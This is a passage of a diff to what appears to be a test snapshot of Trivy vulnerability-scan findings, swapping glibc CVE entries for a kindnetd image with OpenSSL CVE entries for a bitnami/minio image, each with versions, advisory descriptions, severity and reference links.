"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + 